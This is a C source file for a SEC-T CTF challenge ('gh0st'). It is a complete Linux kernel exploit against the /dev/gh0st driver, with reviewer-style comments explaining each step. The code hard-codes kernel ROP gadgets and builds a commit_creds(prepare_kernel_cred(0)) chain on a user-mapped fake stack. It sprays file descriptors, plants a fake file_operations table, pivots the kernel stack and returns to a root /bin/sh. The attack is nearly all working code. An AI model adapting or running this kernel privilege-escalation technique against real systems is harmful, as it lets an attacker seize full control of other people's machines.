SEC-T CTF gh0st
// gcc -static -nostdlib -masm=intel ./exp.c -o exp
// syscall
// Raw x86-64 Linux syscall wrapper: read(2) is syscall number 0.
// It relies on fd/buf/len still being in rdi/rsi/rdx from the C call and on
// nothing between function entry and `syscall` touching them (the build line
// at the top of the file has no -O flag, which is presumably why this holds).
// There is no C `return`: in practice the caller sees whatever `syscall`
// leaves in rax, but for the language this is a non-void function that
// falls off its end (UB).
// NOTE(review): no clobber list is declared — `mov` overwrites rax and
// `syscall` overwrites rcx/r11 behind the compiler's back.
int read(int fd, char* buf, int len) {
__asm__("mov rax, 0");
__asm__("syscall");
}
// Raw x86-64 Linux syscall wrapper: write(2) is syscall number 1.
// Arguments are expected to still be in rdi/rsi/rdx from the C call; the
// result is whatever `syscall` leaves in rax (no C return, no clobber list
// declared for rax/rcx/r11).
int write(int fd, char* buf, int len) {
__asm__("mov rax, 1");
__asm__("syscall");
}
// Raw x86-64 Linux syscall wrapper: open(2) is syscall number 2.
// filename/flags are expected to still be in rdi/rsi from the C call; rdx
// (the mode argument) is left untouched, which is harmless because every
// caller in this file passes O_RDONLY or O_RDWR without O_CREAT.
// The result is whatever `syscall` leaves in rax (no C return, no clobber
// list declared for rax/rcx/r11).
int open(char* filename, int flags) {
__asm__("mov rax, 2");
__asm__("syscall");
}
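// Raw x86-64 Linux syscall wrapper: close(2) is syscall number 3.
// (The original loaded 2, which is open(2) on x86-64 — a copy/paste slip.
// Nothing in this file calls close(), so the mistake was never exercised.)
// fd is expected to still be in rdi from the C call; the result is whatever
// `syscall` leaves in rax (no C return, no clobber list declared for
// rax/rcx/r11).
int close(int fd) {
    __asm__("mov rax, 3");
    __asm__("syscall");
}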
// Raw x86-64 Linux syscall wrapper: exit(2) is syscall number 60.
// status is expected to still be in rdi from the C call. The kernel never
// returns from this syscall, so the missing epilogue does not matter here.
void exit(int status) {
__asm__("mov rax, 60");
__asm__("syscall");
}
// Raw x86-64 Linux syscall wrapper: ioctl(2) is syscall number 16.
// fd/cmd/arg are expected to still be in rdi/rsi/rdx from the C call; the
// result is whatever `syscall` leaves in rax (no C return, no clobber list
// declared for rax/rcx/r11). The cmd values used in this file are specific
// to the /dev/gh0st driver and are not documented here.
int ioctl(unsigned int fd, unsigned int cmd, char* arg) {
__asm__("mov rax, 16");
__asm__("syscall");
}
// Raw x86-64 Linux syscall wrapper: execve(2) is syscall number 59.
// filename/argv/envp are expected to still be in rdi/rsi/rdx from the C
// call. On success the image is replaced and this never returns; on failure
// the result is whatever `syscall` leaves in rax (no C return, no clobber
// list declared for rax/rcx/r11).
int execve(char *filename, char *const argv[], char *const envp[]) {
__asm__("mov rax, 59");
__asm__("syscall");
}
// Raw x86-64 Linux syscall wrapper: mmap(2) is syscall number 9.
// The first three arguments are already in rdi/rsi/rdx from the C call. The
// fourth argument (flags) arrives in rcx under the SysV C ABI but the kernel
// syscall ABI takes it in r10, hence the `mov r10, rcx` — this is the only
// wrapper in the file with more than three arguments, so the only one that
// needs it. fd/offset stay in r8/r9. The result is whatever `syscall` leaves
// in rax (no C return, no clobber list declared for rax/rcx/r10/r11).
void *mmap(void *addr, unsigned long length, int prot, int flags, int fd, unsigned long offset) {
__asm__("mov r10, rcx");
__asm__("mov rax, 9");
__asm__("syscall");
}
// helper
// Counts the bytes of a NUL-terminated string. Freestanding stand-in for the
// libc routine (the file is built with -nostdlib), keeping the original's
// narrower signature: non-const input, int result. Passing NULL is UB.
int strlen(char* string) {
    char *cursor = string;
    while (*cursor != '\0') {
        cursor++;
    }
    return (int)(cursor - string);
}
// Writes a NUL-terminated string to stdout (fd 1), without the trailing
// newline libc's puts() adds. Built on this file's own strlen() and write()
// wrappers; the write(2) result is ignored.
void puts(char* string) {
    write(1, string, strlen(string));
}
// Fills len bytes starting at a with the byte value b. Freestanding stand-in
// for the libc routine, with the original's narrower signature (char fill
// byte, int length, no return value). A non-positive len writes nothing.
void memset(char* a, char b, int len) {
    char *out = a;
    while (len-- > 0) {
        *out++ = b;
    }
}
// for exploit
// Linux UAPI constants, spelled out because the file is built with -nostdlib
// and cannot include <fcntl.h>/<sys/mman.h>. Values are the x86-64 ones.
#define O_RDONLY 0
#define O_RDWR 00000002
#define PROT_READ 0x1
#define PROT_WRITE 0x2
#define MAP_POPULATE 0x8000
// gadgets
// Every address below is a fixed kernel-text address of the CTF target's
// kernel build (the trailing comments are the gadget finder's output). Using
// them verbatim presumes the kernel is not randomised, or that its base was
// obtained elsewhere; with KASLR on, none of these would be valid as-is.
unsigned long pop_rdi = 0xffffffff81000a78; // 0xffffffff81000a78: pop rdi ; ret ; (1290 found)
unsigned long mov_rdi_rax_call_rcx = 0xffffffff8103671d; // 0xffffffff8103671d: mov rdi, rax ; call rcx ; (2 found)
unsigned long pop_rcx = 0xffffffff8101d6dc; // 0xffffffff8101d6dc: pop rcx ; ret ; (19 found)
unsigned long xor_rax = 0xffffffff81076cc0; // 0xffffffff81076cc0: xor rax, rax ; ret ; (5 found) — not used in this file
unsigned long iretq = 0xffffffff812009d0; // fffffff812009d0: 48 cf iretq
unsigned long swapgs_popfq_ret = 0xffffffff81200bea;
// Stack pivot: the hard-coded esp value (0x8948FFF8) is a user-space address,
// which is why _start maps memory at 0x8948f000. Running the kernel on a
// user-mapped stack is exactly what SMAP is designed to fault on.
unsigned long pivot_gadget = 0xffffffff810f3d0e; // 0xffffffff810f3d0e: mov esp, 0x8948FFF8 ; ret ; (1 found)
// Kernel symbol addresses from the same build.
unsigned long commit_creds = 0xffffffff81038563;
unsigned long prepare_kernel_cred= 0xffffffff81038715;
// User-mode segment selectors and flags, captured by save_state() and
// consumed by the iretq frame that _start builds.
unsigned long user_cs;
unsigned long user_ss;
unsigned long user_rflags;
// Snapshots the user-mode cs, ss and rflags into the globals so that the
// iretq frame built in _start can return to user mode with valid selectors.
// NOTE(review): the output constraints are written "r=" rather than the
// conventional "=r"; GCC appears to accept the misplaced '=' with a warning,
// but "=r" is the documented form. The "r" input operands feed the
// uninitialised globals back in and serve no purpose. pushfq and popq are
// two separate asm statements, so this assumes the compiler emits nothing
// that moves the stack between them — presumably true for the unoptimised
// build on the first line, but not something the code enforces.
static void save_state() {
__asm__("mov %0, cs": "r=" (user_cs) : "r" (user_cs));
__asm__("mov %0, ss": "r=" (user_ss) : "r" (user_ss));
__asm__("pushfq");
__asm__("popq %0": "r=" (user_rflags) : "r" (user_rflags));
}
// Landing point in user mode once the kernel-side chain has iretq'd back:
// replaces the process image with /bin/sh through this file's execve()
// wrapper, with only argv[0] set and an empty environment. Returns only if
// execve fails.
void shell(void) {
    char *argv[] = {"/bin/sh", (char *)0};
    execve(argv[0], argv, (char *const *)0);
}
// Program entry point (no libc/crt because of -nostdlib). Builds a fake
// kernel stack in a user mapping, then drives the /dev/gh0st driver into
// pivoting onto it. The driver's request format (the "BFBF" header, the size
// field, the '+'/'-'/',' command bytes) and the two ioctl numbers are
// specific to the CTF target and not visible here; the comments below only
// describe what this code does with them, the trailing comments are the
// author's.
// Defender's view of the assumptions this makes: all kernel addresses are
// hard-coded (no KASLR in play), the pivoted stack lives in user memory
// (SMAP would fault on the first access) and the chain finishes with an iretq
// straight back to user code in this process.
void _start(void) {
int i = 0; // NOTE(review): unused — every loop below declares its own `i`
char buf[0x1000]; // request buffer handed to the driver via ioctl()/write()
int fd;
int fds[0x100]; // 0x100 descriptors on a regular file, read back at the end
unsigned long* fake_stack;
save_state(); // capture user cs/ss/rflags for the iretq frame below
// Map user memory at the fixed address the pivot gadget points into
// (mov esp, 0x8948FFF8); MAP_POPULATE pre-faults it so the kernel never
// page-faults while running on this stack. 0x32 is
// MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS on Linux.
// NOTE(review): the address is passed as an int literal, not a pointer.
fake_stack = mmap(0x8948f000, 0x10000, PROT_READ|PROT_WRITE, 0x32 | MAP_POPULATE, -1, 0);
fake_stack += (0xff8/8); // 0x8948f000 + 0xff8 == 0x8948fff8, the pivot target
// Kernel ROP chain as laid out on the fake stack:
//   commit_creds(prepare_kernel_cred(0)), then swapgs, then iretq to shell().
*fake_stack++ = pop_rdi;
*fake_stack++ = 0; // rdi = 0 -> prepare_kernel_cred(0)
*fake_stack++ = prepare_kernel_cred;
*fake_stack++ = pop_rcx;
*fake_stack++ = commit_creds; // rcx = commit_creds for the call gadget
*fake_stack++ = mov_rdi_rax_call_rcx; // rdi = returned cred, call rcx
*fake_stack++ = swapgs_popfq_ret; // restore user gs base before leaving
*fake_stack++ = 0x246; // value popped into rflags (IF set)
*fake_stack++ = iretq;
// iretq frame: rip, cs, rflags, rsp, ss
*fake_stack++ = &shell; // NOTE(review): pointer stored into unsigned long without a cast
*fake_stack++ = user_cs;
*fake_stack++ = user_rflags;
*fake_stack++ = 0x8948f000 + 0x8000; // user-mode rsp inside the same mapping
*fake_stack++ = user_ss;
fd = open("/dev/gh0st", O_RDWR);
if (fd < 0) {
puts("open error\n");
exit(1);
}
// Open 0x100 descriptors on an ordinary file. Their kernel-side file objects
// are what the fake file_operations table built below is meant to be reached
// through — presumably one of them ends up adjacent to the driver's object;
// the exact heap relationship is target-specific and not visible here.
for (int i=0; i<0x100; i++) {
fds[i] = open("/home/ctf/banner", O_RDONLY);
if (fds[i] < 0) {
puts("open error fds\n");
exit(1);
}
}
// create
buf[0] = 'B'; buf[1] = 'F'; buf[2] = 'B'; buf[3] = 'F'; // header
buf[4] = 0x80; buf[5] = 0x0; buf[6] = 0; buf[7] = 0; // size
memset(buf + 8, '+', 0x1000 - 8);
ioctl(fd, 0x1337B4B3, buf); // driver-specific request; presumably "create"
// 0xffffffffa0... is the kernel module area; this is presumably the
// kernel-side address of this buffer's copy, so +0x108 points at the fake
// file_operations table written below — TODO confirm against the driver.
*(unsigned long*)(buf+0x8) = (unsigned long)0xffffffffa0002380 + 0x108;
// fake ramfs_file_operations
// Zeroed 0x100-byte table with pivot_gadget at slot 2 (offset 0x10), which
// is the .read member of struct file_operations — hence the read() loop at
// the end of the function is what fires it.
for (int i=0; i<0x100/8; i++) {
*(unsigned long*)(buf+0x108 + i*8) = 0;
}
*(unsigned long*)(buf+0x108 + 2 * 8) = pivot_gadget;
// The rest of the buffer is the driver's command stream; the meaning of
// '-', ',' and '+' below is the author's description, not verifiable here.
memset(buf + 0x208, '-', 0x1000-0x208); // decrease stack ptr
for (int i=0; i<8; i++) {
buf[0x208+0xb0 + i*2 ] = ','; // write stack
buf[0x209+0xb0 + i*2] = '+'; // increase stack ptr
}
write(fd, buf, 0x1000);
ioctl(fd, 0xAC1DC0DE, buf); // driver-specific request; presumably "run"
// Touch every sprayed descriptor; the one whose f_op now points at the fake
// table runs pivot_gadget and the chain above.
for (int i=0; i<0x100; i++) {
read(fds[i], buf, 0x1000);
}
// Spin if the chain was never reached (success leaves via shell()).
// NOTE(review): exit(0) is unreachable after an unconditional while(1).
while (1) {}
exit(0);
}